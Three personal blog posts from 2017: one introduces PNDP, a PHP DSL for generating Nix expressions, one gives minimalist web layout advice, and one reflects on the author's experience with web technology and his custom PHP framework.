Monday, September 11, 2017

PNDP: An internal DSL for Nix in PHP

It has been a while since I wrote a Nix-related blog post. In many of my earlier Nix blog posts, I have elaborated about various Nix applications and their benefits.

However, when you are developing a product or service, you typically do not only want to use configuration management tools, such as Nix -- you may also want to build a platform that is tailored towards your needs, so that common operations can be executed structurally and conveniently.

When it is desired to integrate custom solutions with Nix-related tools, you basically have one recurring challenge -- you must generate deployment specifications in the Nix expression language.

The most obvious solution is to use string manipulation to generate the expressions we want, but this has a number of disadvantages. Foremost, composing strings is not a very intuitive activity -- it is not always obvious to see what the end result would be by looking at the code.

Furthermore, it is difficult to ensure that a generated expression is correct and safe. For example, if a string value is not properly escaped, it may be possible to inject arbitrary deployment code putting the security of the deployed system at risk.

For these reasons, I have developed NiJS: an internal DSL for JavaScript, a couple of years ago to make integration with JavaScript-based applications more convenient. Most notably, NiJS is used by node2nix to generate Nix expressions from NPM package deployment specifications.

I have been doing PHP development in the last couple of weeks and realized that I needed a similar solution for this language. In this blog post, I will describe PNDP, an internal DSL for Nix in PHP, and show how it can be used.

Composing Nix packages in PHP

The Nix packages repository follows a specific convention for organizing packages -- every package is a Nix expression file containing a function definition describing how to build a package from source code and its build-time dependencies.

A top-level composition expression file provides all the function invocations that build variants of packages (typically only one per package) by providing the desired versions of the build-time dependencies as function parameters.

Every package definition typically invokes stdenv.mkDerivation {} (or abstractions built around it) that composes a dedicated build environment in which only the specified dependencies can be found and other kinds of precautions are taken to improve build reproducibility. In this builder environment, we can execute many kinds of build steps, such as running GNU Make, CMake, or Apache Ant.

In our internal DSL in PHP we can replicate these conventions using PHP language constructs. We can compose a proxy to the stdenv.mkDerivation {} invocation in PHP by writing the following class:

namespace Pkgs;
use PNDP\AST\NixFunInvocation;
use PNDP\AST\NixExpression;

class Stdenv
    public function mkDerivation($args)
        return new NixFunInvocation(new NixExpression("pkgs.stdenv.mkDerivation"), $args);

In the above code fragment, we define a class named: Stdenv exposing a method named mkDerivation. The method composes an abstract syntax tree for a function invocation to stdenv.mkDerivation {} using an arbitrary PHP object of any type as a parameter.

With the proxy shown above, we can create our own in packages in PHP by providing a function definition that specifies how a package can be built from source code and its build-time dependencies:

namespace Pkgs;

class Hello
    public static function composePackage($args)
        return $args->stdenv->mkDerivation(array(
            "name" => "hello-2.10",

            "src" => $args->fetchurl(array(
                "url" => new NixURL("mirror://gnu/hello/hello-2.10.tar.gz"),
                "sha256" => "0ssi1wpaf7plaswqqjwigppsg5fyh99vdlb9kzl7c9lng89ndq1i"

            "doCheck" => true,

            "meta" => array(
                "description" => "A program that produces a familiar, friendly greeting",
                "homepage" => new NixURL(""),
                "license" => "GPLv3+"

The above code fragment defines a class named 'Hello' exposing one static method named: composePackage(). The composePackage method invokes the stdenv.mkDerivation {} proxy (shown earlier) to build GNU Hello from source code.

In addition to constructing a package, the above code fragment also follows the PHP conventions for modularization -- in PHP it is a common practice to modularize code chunks into classes that reside in their own namespace. For example, by following these conventions, we can also automatically load our package classes by using an autoloading implementation that follows the PSR-4 recommendation.

We can create compositions of packages as follows:

class Pkgs
    public $stdenv;

    public function __construct()
        $this->stdenv = new Pkgs\Stdenv();

    public function fetchurl($args)
        return Pkgs\Fetchurl::composePackage($this, $args);

    public function hello()
        return Pkgs\Hello::composePackage($this);

As with the previous example, the composition example is a class. In this case, it exposes variants of packages by calling the functions with their required function arguments. In the above example, there is only one variant of the GNU Hello package. As a result, it suffices to just propagate the object itself as build parameters.

Contrary to the Nix expression language, we must expose each package composition as a method -- the Nix expression language is a lazy language that only invokes functions when their results are needed, PHP is an eager language that will evaluate them at construction time.

An implication of using eager evaluation is that opening the composition module, triggers all packages to be built. By wrapping the compositions into methods, we can make sure that they only the requested packages are evaluated when needed.

Another practical implication of creating methods for each package composition is that it can become quite tedious if we have many of them. PHP offers a magic method named: __call() that gets invoked when we invoke a method that does not exists. We can use this magic method to automatically compose a package based on the method name:

public function __call($name, $arguments)
    // Compose the classname from the function name
    $className = ucfirst($name);
    // Compose the name of the method to compose the package
    $methodName = 'Pkgs\\'.$className.'::composePackage';
    // Prepend $this so that it becomes the first function parameter
    array_unshift($arguments, $this);
    // Dynamically the invoke the class' composition method with $this as first parameter and the remaining parameters
    return call_user_func_array($methodName, $arguments);

The above method takes the (non-existent) method name, converts it into the corresponding class name (by using the camel case naming convention), invokes the package's composition method using the composition object itself as a first parameter, and any other method parameters as successive parameters.

Converting PHP language constructs into Nix language constructs

Everything that PNDP does boils down to the phpToNix() function that automatically converts most PHP language constructs into semantically equivalent or similar Nix language constructs. For example, the following PHP language constructs are converted to Nix as follows:

  • A variable of type boolean, integer or double are converted verbatim.
  • A string will be converted into a string in the Nix expression language, and conflicting characters, such as the backslash and double quote, will be escaped.
  • In PHP, arrays can be sequential (when all elements have numeric keys that appear in numeric order) or associative in the remainder of the cases. The generator tries to detect what kind of array we have. It recursively converts sequential arrays into Nix lists of Nix language elements, and associative arrays into Nix attribute sets.
  • An object that is an instance of a class, will be converted into a Nix attribute set exposing its public properties.
  • A NULL reference gets converted into a Nix null value.
  • Variables that have an unknown type or are a resource will throw an exception.

As with NiJS (and JavaScript), the PHP host language does not provide equivalents for all Nix language constructs, such as values of the URL type, or encoding Nix function definitions.

You can still generate these objects by composing an abstract syntax from objects that are instances of the NixObject class. For example, when composing a NixURL object, we can generate a value of the URL type in the Nix expression language.

Arrays are a bit confusing in PHP, because you do not always know in advance whether it would yield a list or attribute set. To make these conversions explicit and prevent generation errors, they can be wrapped inside a NixList or NixAttrSet object.

Building packages programmatically

The PNDPBuild::callNixBuild() function can be used to build a generated Nix expression, such as the GNU Hello example shown earlier:

/* Evaluate the package */
$expr = PNDPBuild::evaluatePackage("Pkgs.php", "hello", false);

/* Call nix-build */
PNDPBuild::callNixBuild($expr, array());

In the code fragment above, we open the composition class file, named: Pkgs.php and we evaluate the hello() method to generate the Nix expression. Finally, we call the callNixBuild() function, in which we evaluate the generated expression by the Nix package manager. When the build succeeds, the resulting Nix store path is printed on the standard output.

Building packages from the command-line

As the previous code example is so common, there is also a command-line utility that can execute the same task. The following instruction builds the GNU Hello package from the composition class (Pkgs.php):

$ pndp-build -f Pkgs.php -A hello

It may also be useful to see what kind of Nix expression is generated for debugging or testing purposes. The --eval-only option prints the generated Nix expression on the standard output:

$ pndp-build -f Pkgs.js -A hello --eval-only

We can also nicely format the generated expression to improve readability:

$ pndp-build -f Pkgs.js -A hello --eval-only --format


In this blog post, I have described PNDP: an internal DSL for Nix in PHP.

PNDP is not the first internal DSL I have developed for Nix. A couple of years ago, I also wrote NiJS: an internal DSL in JavaScript. PNDP shares a lot of concepts and implementation details with NiJS.

Contrary to NiJS, the functionality of PNDP is much more limited -- I have developed PNDP mainly for code generation purposes. In NiJS, I have also been exploring the abilities of the JavaScript language, such as exposing JavaScript functions in the Nix expression language, and the possibilities of an internal DSL, such as creating an interpreter that makes it a primitive standalone package manager. In PNDP, all this extra functionality is missing, since I have no practical need for them.

In a future blog post, I will describe an application that uses PNDP as a generator.


PNDP can obtained from Packagist as well as my GitHub page. It can be used under the terms and conditions of the MIT license.

Tuesday, August 29, 2017

A checklist of minimalistic layout considerations for web applications

As explained in my previous blog post, I used to be quite interested in web technology and spend considerable amounts of time developing my own framework providing solutions for common problems that I used to face, such as layout management and data management.

Another challenge that you cannot avoid is the visual appearance of your web application. Today, there are many frameworks and libraries available allowing you to do impressive things, such as animated transitions, fade in/fade out effects and so on.

Unfortunately, many of these "modern" solutions also have number of big drawbacks -- typically, they are big and complex JavaScript-based frameworks significantly increasing the download size of pages and the amount of required system resources (e.g. CPU, GPU, battery power) to render a page. As a result, it is not uncommon that the download size of many web sites equal the Doom video game and may feel slow and sluggish.

Some people (such as the author of this satirical website) suggest that most (all?) visual aspects are unnecessary and that simply a "vanilla" page displaying information suffices to provide a user what he needs. I do not entirely agree with this viewpoint as many web sites are not just collections of pages but complex information systems. Complex information systems require some means of organizing data including a layout that reflects this, such as menu panels that guide a user through the desired sets of information.

I know many kinds of tricks (and hacks) to implement layouts and visual aspects, but one thing that I am not particularly good at is designing visuals myself. There is a big pool of layout considerations to choose from and many combinations that can be made. Some combinations of visual aspects are good, others are bad -- I simply lack the intuition to make the right choices. This does not apply to web design only -- when I had to choose furniture for my house I basically suffered from the same problem. As a result, I have created (by accident) a couple of things that look nice and other things that look dreadful :-)

Although I have worked with designers, it is not always possible to consult one, in particular for non-commercial/more technical projects.

In this blog post, I have gathered a number of minimalistic layout considerations that, regardless of the objective of the system and the absence of design intuition, I find worth to consider, with some supporting information so that rational decisions can be made. Furthermore, they are relatively simple to apply and do not require any framework.

Text size

A web application's primary purpose is providing information. As a consequence, how you present text is very important.

A number of studies (such as this one by Jakob Nielsen in 1997) show that visitors of web pages do not really read, but scan for information. Although this study was done many years ago it still applies to today's screens, such as tablets and devices that were designed for reading books, such as the Kindle.

Because users typically read much slower from a screen than from paper and hardly read sections entirely, it is a very good idea to pick a font size that is large enough.

In most browsers, the default font size is set to 16 pixels. Studies suggest that this size is all but too small, in particular for high resolution screens that we use nowadays. Moreover, a font size of 16px on modern screens, is somewhat equal to the font size of a (physical) book.

Moreover, CSS allows you to define the font sizes statically or relatively. In my opinion (supported by this article), it is a good practice to use relative font sizes, because it is a good habit to allow users to control the size of the fonts.

For me, typically the following CSS setting suffices:

    font-size: 100%;


When I was younger, I had the tendency to put as much information on a page as possible, such as densily written text, images and tables. At some point, I worked with a designer who constantly reminded me that I should keep enough space between page elements.

(As a sidenote: space should not necessarily be white space, but could also be the background color or background gradient. Some designers call this kind of space "negative spacing").

Why is sufficient negative spacing a good thing? According to some sources, filling a page with too many details, such as images, makes it difficult to maintain a user's attention. For example, if a page contains too much graphics or have colors that appear unrelated to the rest of the page, a user will quickly skip details.

Furthermore, some studies suggest that negative spacing is an effective way to emphasize important elements of a page and a very effective way to direct the flow of a page.

From an implementation perspective, there are many kinds of HTML elements that could be adjusted (from the browser's default settings) to use a bit of extra spacing, such as:

  • Text: I typically adjust the line-height to 1.2em increasing the space between each sentence of a paragraph.
  • For divs and other elements that define sections, I increase their margins and paddings. Typically I would set them to at least: 1em.
  • For table and table cells I increase their paddings to 0.5em.
  • For preformatted text: pre I use a padding value of at least 1em.
  • For list items (entries of an unordered or ordered list) I add a bit of extra spacing on top, e.g. li { margin: 0.2em 0; }.

Some people would argue that the above list of adjustments are still quite conservative and even more spacing should be considered.

Font color/foreground contrast

Another important thing is to pick the right foreground colors (such as the text color) and ensure that they have sufficient contrast -- for example, light grey colored text on a white background is very difficult for users to read.

In most browsers, the default setting is to have a white background and black colored text. Although this color scheme maximizes contrast, too much contrast also has a disadvantage -- it maximizes a user's attention span for a while, but a user cannot maintain such a level of attention indefinitely.

When displaying longer portions of text, it is typically better to lower the contrast a bit, but not too much. For example, when I want to display black colored text on a white background, I tune down the contrast a bit by setting the text color to dark grey: #444; as opposed to black: #000; and the background color to very light grey: #ddd; as opposed to white: #fff;.

Defining panels and sections

A web application is typically much more than just a single page of content. Typically, they are complex information systems displaying many kinds of data. This data has to be to be divided, categorized and structured. As a result, we also need facilities that guide the users through these sets of information, such as menu and content panels.

Creating a layout with "panels" turns out to be quite a complex problem, for which various kinds of strategies exist each having their pros and cons. For example, I have used the following techniques:

  • Absolute positioning. We add the property: position: absolute; to a div and we use the left, right, top and bottom properties to specify the coordinates of the top left and bottom right position of the panel. As a result, the div automatically gets positioned (relative to the top left position of the screen) and automatically gets a width and height. For the sections that need to expand, e.g. the contents panel displaying the text, we use the overflow: auto; property to enable vertical scroll bars if needed.

    Although this strategy seems to do mostly what I want, it also has a number of drawbacks -- the position of the panels is fixed. For desktops this is usually fine, but for screens with a limited height (such as mobile devices and tablets) this is quite impractical.

    Moreover, it used to be a big problem when Internet Explorer 6 was still the dominant browser -- IE6 did not implement the property that automatically derives the width and height, requiring me to implement a workaround stylesheet using JavaScript to compute the width and heights.
  • Floating divs is a strategy that is more friendly to displays with a limited height but has different kinds of challenges. Basically, by adding a float property to each panel, e.g. float: left; and specifying a width we can position columns next to each other. By using a clear hack, such as: <div style="clear: both;"></div> we can position a panel right beneath another panel.

    This strategy mostly makes sense despite the fact that the behaviour of floating elements in somewhat strange. One of the things that is very hard to solve is to create a layout in which columns have an equal height when their heights are not known in advance -- someone has written a huge blog post with all kinds of strategies. I, for example, implemented the "One True Layout Method" (a margin-padding-overflow hack) quite often.
  • Flexbox is yet another (more modern) alternative and the most powerful solution IMO so far. It allows you to consicely specify the how divs should be positioned, wrapped and sized. The only downside I see so far, is that these properties are relatively new and require very new implementations of browser layout engines. Many users typically do not bother that much to upgrade their browsers, unless they are forced.

Resolution flexibility (a.k.a. responsive web design)

When I just gained access to the Internet, nearly all web page visitors used to be desktop users. Today, however, a substantial number of visitors use different kinds of devices, having small screens (such as phones and tablets) and very big screens (such as TVs).

To give all these visitors a relatively good user experience, it is important to make the layout flexible enough to support many kinds of resolutions. Some people call this kind of flexibility responsive web design, but I find that term somewhat misleading.

Besides the considerations shown earlier, I also typically implement the following aspects in order to become even more flexible:

  • Eliminating vertical menu panels. When we have two levels of menu items, I typically display the secondary menu panel on the left on the screen. For desktops (and bigger screens) this is typically OK, but for smaller displays it eats too much space from the section that displays the contents. I typically use media queries to reconfigure these panels in such a way that the items on these menu panels are aligned horizontally by default and, when the screen width is big enough, they will be aligned vertically.
  • Making images dynamically resizable. Images, such as photos in a gallery, may be too big to properly display on a smaller screen, such as a phone. Fortunately, by providing the max-width setting we can adjust the style of images in such a way that their maximum width never exceeds the screen size and their dimensions get scaled accordingly:

        max-width: 100%;
        width: auto;
        height: auto;
  • Adding horizontal scroll bars, when needed. For some elements, it is difficult to resize them in such a way that they never exceed the screen width, such as sections of preformatted text which I typically use to display code fragments. For these kinds of elements I typically configure the overflow-x: auto; property so that horizontal scroll bars appear when needed.

Picking colors

In addition to the text and the background colors, we may also want to pick a couple of additional colors. For example, we need different colors for hyperlinks so that it becomes obvious to users what is clickable and what not, and whether a link has already been visited or not. Furthermore, providing distinct colors for the menu panels, headers, and buttons would be nice as well.

Unfortunately, when it comes to picking colors, my intuition lets me down completely -- I do not know what "nice colors" are or which colors fit best together. As a result, I always have a hard time making the right choices.

Recently, I discovered a concept called "color theory" that lets you decide, somewhat rationally, what colors to pick. The basic idea behind color theory is that you pick a base color and then apply a color scheme to get a number of complementary colors, such as:

  • Triadic. Composed of 3 colors on separate ends of the color spectrum.
  • Compound. One color is selected in the same area of the color spectrum and two colors are chosen from opposite ends of the color spectrum.
  • Analogous. Careful selection of colors in the same area of the color spectrum.

A particular handy online tool (provided by the article shown above) is paletton that seems to provide me good results -- it supports various color schemes, has a number of export functions (including CSS) and a nice preview function that shows you what a web page would look like if you apply the generated color scheme.

Unfortunately, I have not found any free/open-source solutions or a GIMP plugin allowing me to do the same.


Something that is typically overlooked by many developers is printing. For most interactive web sites this not too important, but for information systems including reservation systems, it is also a good practice to implement proper printing support.

I consider it to be a good practice to hide non-relevant panels, such as the menu panels:

@media only print
    #header, #menu
        display: none;

Furthermore, it is also a good practice to tune down the amount of colors a bit.

A simple example scenario

As an experiment to test the above listed concerns (e.g. text-size, foreground contrast, using paletton to implement color theory and NOT trusting my intuition), I ended up implementing the following "design":

This is what it looks on a desktop browser:

For printing, the panels and colors are removed:

The page is even functional in a text oriented browser (w3m):

By using media queries, we can adjust the positioning of the sub menu to make more space available for the contents panel on a mobile display (my Android phone):

The layout does not look shiny or fancy, but it appears functional to me, but hey, don't ask me too much since I simply lack the feeling for design. :-)

In my previous blog post, I have described my own custom web framework for which I released a number additional components. I have also implemented an example repository with simple demonstration applications. I have decided to use my "rationally crafted layout" to make them look a bit prettier.


In this blog post, I have gathered a collection of minimalistic layout considerations for myself that, regardless of the objective of a web application, I find worth to consider. Moreover, these concerns can be applied mostly in a rational way, which is good for people like me who lack design intuition.

Although I have described many aspects in this blog post, applying the above considerations will not produce any fancy/shiny web pages. For example, you can implement many additional visual aspects, such as rounded corners, shadows, gradients, animated transitions, fade-ins and fade-outs, and so on.

Moreover, from writing this blog post I learned a thing or two about usability and HTML/CSS tricks. However, I again observed that the more you know, the more you realize that you do not know. For example, there are even more specialized studies available, such as one about the psychology of colors that, for example, shows that women prefer blue, purple, and green, and men prefer blue, green, and black.

This, however, is where I draw the line when it comes to learning design skills and made me realize why I do not prefer to become a front-end/design specialist. Knowing some things about design is always useful, but the domain is much deeper and complex than I initially thought.

The only thing that I still like to do is finding additional, simple, rationally applicable design considerations. Does anyone have some additional suggestions for me?

Sunday, July 2, 2017

Some reflections on my experiences with web technology

It has been a while since I wrote my last blog post. In the last couple of months, I have been working on many kinds of things, such as resurrecting the most important components of my personal web framework (that I have developed many years ago) and making them publicly available on GitHub.

There are a variety of reasons for me to temporarily switch back to this technology area for a brief period of time -- foremost, there are a couple of web sites still using pieces of my custom framework, such as those related to my voluntary work. I recently had to make changes, mostly maintenance-related, to these systems.

The funny thing is that most people do not consider me a web development (or front-end) person and this has an interesting history -- many years ago (before I started doing research) I always used to refer to "web technology" as one of my main technical interests. Gradually, my interest started to fade, up until the point that I stopped mentioning it.

I started this blog somewhere in the middle of my research, mainly to provide additional practical information. Furthermore, I have been using my blog to report on everything I do open-source related.

If I would have started this blog several years earlier, then many articles would have been related to web technology. Back then, I have spent considerable amounts of time investigating techniques, problems and solutions. Retrospectively, I regret that it took me so long to make writing a recurring habit as part of my work -- many interesting discoveries were never documented and have become forgotten knowledge.

In this blog post, I will reflect over my web programming experiences, describe some of the challenges I used to face and what solutions I implemented.

In the beginning: everything looked great

I vividly remember the early days in which I was just introduced to the internet, somewhere in the mid 90s. Around that time Netscape Navigator 2.0 was still the dominant and most advanced web browser.

Furthermore, the things I could do on the internet were very limited -- today we are connected to the internet almost 24 hours a day (mainly because many of us have smart phones allowing us to do so), but back then I only had a very slow 33K6 dial-up modem and internet access for only one hour a week.

Aside from the fact that it was quite an amazing experience to be connected to the world despite these limitations, I was also impressed by the underlying technology to construct web sites. It did not take long for me to experiment with these technologies myself, in particular HTML.

Quite quickly I was able to construct a personal web page whose purpose was simply to display some basic information about myself. Roughly, what I did was something like this:

    <title>My homepage</title>

  <body bgcolor="#ff0000" text="#000000">
    <h1>Hello world!</h1>

      Hello, this is my homepage.
      <img src="image.jpg" alt="Image">

It was simply a web page with a red colored background displaying some text, hyperlinks and images:

You may probably wonder what is so special about building a web page with a dreadful background color, but before I was introduced to web technology, my programming experience was limited to various flavours of BASIC (such as Commodore 64, AMOS, GW and Quick BASIC), Visual Basic, 6502 assembly and Turbo Pascal.

Building user interfaces with these kind of technologies was quite tedious and somewhat impractical compared to using web technology -- for example, you had to programmatically define your user interface elements, size them, position them, define style properties for each individual element and programming event handlers to respond to user events, such as mouse clicks.

With web technology this suddenly became quite easy and convenient -- I could now concisely express what I wanted and the browser took care of the rendering parts.

Unknowingly, I was introduced to a discipline called declarative programming -- I could describe what I wanted as opposed to specifying how to do something. Writing applications declaratively had all kinds of advantages beyond the ability to express things concisely.

For example, because HTML code is high-level (not entirely, but is supposed to be), it does not really matter much what browser application you use (or underlying platform, such as the operating system) making your application quite portable. Rendering a paragraph, a link, image or button can be done on many kinds of different platforms from the same specification.

Another powerful property is that your application can degrade gracefully. For example, when using a text-oriented browser, your web application should still be usable without the ability to display graphics. The alternate text (alt) attribute of the image element should ensure that the image description is still visible. Even when no visualization is possible (e.g. for visually impaired people), you could, for example, use a Text to Speech system to interpret your pages' content.

Moreover, the introduction of Cascading Style Sheets (CSS) made it possible to separate the style concern from the page structure and contents making the code of your web page much more concise. Before CSS, extensive use of presentational tags could still make your code quite messy. Separation of the style concern also made it possible to replace the stylesheet without modifying the HTML code to easily give your page a different appearance.

To deal with visual discrepancies between browser implementations, HTML was standardized and standards-mode rendering was introduced when an HTML doctype was added to a HTML file.

What went wrong?

I have described a number of appealing traits of web technology in the previous section -- programming applications declaratively from a high level perspective, separation of concerns, portability because of high-level abstractions and standardization, the ability to degrade gracefully and conveniently making your application available to the world.

What could possibly be the reason to lose passion while this technology has so many compelling properties?

I have a long list of anecdotes, but most of my reasons can be categorized as follows:

There are many complex additional concerns

Most web technologies (e.g. HTML, CSS, JavaScript) provide solutions for the front-end, mainly to serve and render pages, but many web applications are much more than simply a collection of pages -- they are in fact complex information systems.

To build information systems, we have to deal with many additional concerns, such as:

  • Data management. User provided data must be validated, stored, transformed in something that can be visually represented, properly escaped so that they can be inserted into a database (preventing SQL injections).
  • Security. User permissions must be validated on all kinds of levels, such as page level, or section level. User roles must be defined. Secure connections must be established by using the SSL protocol.
  • Scalability. When your system has many users, it will no longer be possible to serve your web application from a single web server because it lacks sufficient system resources. Your system must be decomposed and optimized (e.g. by using caching).

In my experience, the tech companies I used to work for understood these issues, but I also ran into many kinds of situations with non-technical people not understanding that all these things were complicated and necessary.

One time, I even ran into somebody saying: "Well, you can export Microsoft Word documents to HTML pages, right? Why should things be so difficult?".

There is a lack of abstraction facilities in HTML

As explained earlier, programming with HTML and CSS could be considered declarative programming. At the same time, declarative programming is a spectrum -- it is difficult to draw a hard line between what and how -- it all depends on the context.

The same thing applies to HTML -- from one perspective, HTML code can be considered a "what specification" since you do not have specify how to render a paragraph, image or a button.

In other cases, you may want to do things that cannot be directly expressed in HTML, such as embedding a photo gallery on your web page -- there is no HTML facility allowing you to concisely express that. Instead, you must provide the corresponding HTML elements that implement the gallery, such as the divisions, paragraphs, forms and images. Furthermore, HTML does not provide you any facilities to define such abstractions yourself.

If there are many recurring high level concepts to implement, you may end up copying and pasting large portions of HTML code between pages making it much more difficult to modify and maintain the application.

A consequence of not being able to define custom abstractions in HTML is that it has become very common to generate pages server side. Although this suffices to get most jobs done, generating dynamic content is many times more expensive than serving static pages, which is quite silly if you think too much about it.

A very common sever side abstraction I used to implement (in addition to an embedded gallery) is a layout manager allowing you to manage static common sections, a menu structure and dynamic content sections. I ended up inventing such a component because I was used to frames, that became deprecated. Moving away from them required me to reimplement common sections of a page over and over again.

In addition to generated code, using JavaScript also has become quite common by dynamically injecting code into the DOM or transforming elements. As a result, quite a few pages will not function properly when JavaScript has been disabled or when JavaScript in unsupported.

Moreover, many pages embed a substantial amount of JavaScript significantly increasing their sizes. A study reveals that the total size of a quite a few modern web pages are equal to the Doom video game.

There is a conceptual mismatch between 'pages' and 'screens'

HTML is a language designed for constructing pages, not screens. However, information systems typically require a screen-based workflow -- users need to modify data, send their change requests to the server and update their views so that their modifications become visible.

In HTML, there are only two ways to propagate parameters to the server and getting feedback -- with hyperlinks (containing GET parameters) or forms. In both cases, a user gets redirected to another page that should display the result of the action.

For pages displaying tabular data or other complicated data structures, this is quite inconvenient -- we have to rerender the entire page each time we change something and scroll the user back to the location where the change was made (e.g. by defining anchors).

Again, with JavaScript this problem can be solved in a more proper and efficient way -- by programming an event handler (such as a handler for the click event), using the XMLHttpRequest object to send a change message to the server and updating the appropriate DOM elements, we can rerender only the affected parts.

Unfortunately, this again breaks the declarative nature of web technologies and the ability to degrade gracefully -- in a browser that lacks JavaScript support (e.g. text-oriented browsers) this solution will not work.

Also, efficient state management is a complicated problem, that you may want to solve by integrating third party JavaScript libraries, such as MobX or Redux.

Layouts are extremely difficult

In addition to the absence of abstractions in HTML (motivating me to develop a layout manager), implementing layouts in general is also something I consider to be notoriously difficult. Moreover, the layout concern is not well separated -- some aspects need to be done in your page structure (HTML code) and other aspects need to be done in stylesheets.

Although changing most visual properties of page elements in CSS is straight forward (e.g. adjusting the color of the background, text or borders), dealing with layout related aspects (e.g. sizing and positioning page elements) is not. In many cases I had to rely on clever tricks and hacks.

One of the weirdest recurring layout-tricks I used to implement is a hack to make the height of two adjacent floating divs equal. This is something I commonly used to put a menu panel next to a content panel displaying text and images. You do not know in advance the height of both panels.

I ended up solving this problems as follows. I wrapped the divs in a container div:

<div id="container">
  <div id="left-column">
  <div id="right-column">

and I provided the following CSS stylesheet:

    overflow: hidden;

    padding-bottom: 3000px;
    margin-bottom: -3000px;

    padding-bottom: 3000px;
    margin-bottom: -3000px;

In the container div, I abuse the overflow property (disabling scroll bars if the height exceeds the screen size). For the panels themselves, I use a large padding value value and a equivalent negative margin. The latter hack causes the panels to stretch in such a way that their heights become equal:

(As a sidenote: the above problem can now be solved in a better way using a flexbox layout, but a couple of years ago you could not use this newer CSS feature).

The example shown above is not an exception. Another notable trick is the clear hack (e.g. <div style="clear: both;"></div>) to ensure that the height of the surrounding div grows automatically with the height of your inner divs.

As usual, JavaScript can be used to solved to abstract these oddities away, but breaks declarativity. Furthermore, when JavaScript is used for an essential part of your layout, your page will look weird if JavaScript has been disabled.

Interoperability problems

Many web technologies have been standardized by the World Wide Web Consortium (W3C) with the purpose to ensure interoperability among browsers. The W3C also provides online validator services (e.g. for HTML and CSS) that you can use to upload your code and check for its validity.

As an outsider, you may probably expect that if your uploaded code passes validation that your web application front-end is interoperable and will work properly in all browsers... wrong!

For quite some time, Internet Explorer 6 was the most dominant web browser. Around the time that it was released (2001) it completely crushed its biggest competitor (Netscape) and gained 95% market share. Unfortunately, it did not support modern web standards well (e.g. CSS 2 and newer). After winning the browser wars, Microsoft pretty much stopped its development.

Other browsers kept progressing and started to become much more advanced (most notably Mozilla Firefox). They also followed the web standards more faithfully. Although this was a good development, the sad thing was that in 2007 (6 years later) Internet Explorer 6 was still the most dominant browser with its lacking support of standards and many conformance bugs -- as a result, you were forced to implement painful IE-specific workarounds to make your web page work properly.

What I typically used to do is that I implemented a web page for "decent browsers" first (e.g. Firefox, Chrome, Safari), and then added Internet Explorer-specific workarounds (such as additional stylesheets) on top. By using conditional comments, an Internet Explorer-specific feature that treated certain comments as code, I could ensure that the hacks were not used by any non-IE browser. An example usage case is:

<!--[if lt IE 7]><link rel="stylesheet" type="text/css" href="ie-hacks.css"><![endif]-->

The above conditional comment states that if an Internet Explorer version lower than 7 is used, then the provided ie-hacks.css stylesheet should be used. Otherwise, it is treated as a comment and will be ignored.

Fortunately, Google Chrome overtook the role as the most dominant web browser and is developed more progressively eliminating most standardization problems. Interoperability today is still not a strong guarantee, in particular for new technologies, but considerably better around the time that Internet Explorer still dominated the browser market.

Stakeholder difficulties

Another major challenge are the stakeholders with their different and somewhat conflicting interests.

The most important thing that matters to the end-user is that a web application provides the information they need, that it can be conveniently found (e.g. through a search engine), and that they are not distracted too much. Visual appearance of your web site also matters in some extent (e.g. a dreadful appearance your web site will affect an end user's ability to find what they need and your credibility), but is typically not as important as most people think.

Most clients (the group of people requesting your services) are mostly concerned with visual effects and features, and not so much with the information they need to provide to their audience.

I still vividly remember a web application that I developed whose contents could be fully managed by the end user with a simple HTML editor. I deliberately kept the editor's functionality simple -- for example, it was not possible in the editor to adjust the style (e.g. the color of the text or background), because I believed that users should simply follow the stylesheet.

Moreover, I have spent substantial amounts of time explaining clients how to write for the web -- they need to structure/organize their information properly write concisely and structure/format their text.

Despite all my efforts in bridging the gap between end-users and clients, I still remember that one particular client ran away dissatisfied because of the lack of customization. He moved to a more powerful/flexible CMS, and his new homepage looked quite horrible -- ugly background images, dreadful text colors, sentences capitalized, e.g.: "WELCOME TO MY HOMEPAGE!!!!!!".

I also had been in a situation once in which I had to deal with two rivaling factions in a organization -- one being very supportive with my ideas and another being completely against them. They did not communicate with each other much and I basically had to serve as a proxy between them.

Also, I have worked with designers giving me mixed experiences. A substantial group of designers basically assumed that a web page design is the same thing as a paper design, e.g. a booklet.

With a small number of them I had quite a few difficulties explaining that web page designs need to be flexible and working towards a solution meeting these criteria -- people use different kinds of screen sizes, resolutions. People tend to resize their windows, adjust their font sizes, and so on. Making a design that is too static will affect how many users you will attract.

Technology fashions

Web technology is quite sensitive to technological fashions -- every day new frameworks, libraries and tools appear, sometimes for relatively new and uncommon programming languages.

While new technology typically provides added value, you can also quite easily shoot yourself in the foot. Being forced to work around a system's broken foundation is not particularly a fun job.

Two of my favorite examples of questionable technology adoptions are:

  • No SQL databases. At some point, probably because of success stories from Google, a lot of people consider traditional relational databases (using SQL) not to be "web scale" and massively shifted to so-called "No SQL databases". Some well known NoSQL databases (e.g. MongoDB) sacrifice properties in service of speed -- such as consistency guarantees.

    In my own experience, many applications that I developed, the relational model made perfect sense. Also, consistency guarantees were way more important than speed benefits. As a matter of fact, most of my applications were fast enough. (As a sidenote: This does not disqualify NoSQL databases -- they have legitimate use cases, but in many cases they are simply not needed).
  • Single threaded event loop server applications (e.g. applications built on Node.js).

    The single thread event loop model has certain kinds of benefits over the traditional thread/process per connection approach -- little overhead in memory and multitasking making it a much better fit to handle large numbers of connections.

    Unfortunately, most people do not realize that there are two sides of the coin -- in a single threaded event loop, the programmer has the responsibility to make sure that it never blocks so that that your application remains responsive (I have seen quite a few programmers who simply lack the understanding and discipline to do that).

    Furthermore, whenever something unexpected goes wrong you end up with an application that crashes completely making it much more sensitive to disruptions. Also, this model is not a very good fit for computationally intensive applications.

    (Again: I am not trying to disqualify Node.js or the single threaded event loop concept -- they have legitimate use cases and benefits, but it is not always a good fit for all kinds of applications).

My own web framework

I have been extensively developing a custom PHP-based web framework between 2002 and 2009. Most of its ideas were born while I was developing a web-based information system to manage a documentation library for a side job. I noticed that there were quite a few complexities that I had to overcome to make it work properly, such as database integration, user authentication, and data validation.

After completing the documentation library, I had been developing a number of similarly looking information systems with similar functionality. Over the years, I learned more techniques, recognized common patterns, captured abstractions, and kept improving my personal framework. Moreover I had been using my framework for a variety of additional use cases including web sites for small companies.

In the end, it evolved into a framework providing the following high level components (the boxes in the diagram denote packages, while the arrows denote dependency relationships):

  • php-sbdata. This package can be used to validate data fields and present data fields. It can also manage collections of data fields as forms and tables. Originally this package was only used for presentation, but based on my experience with WebDSL I have also integrated validation.
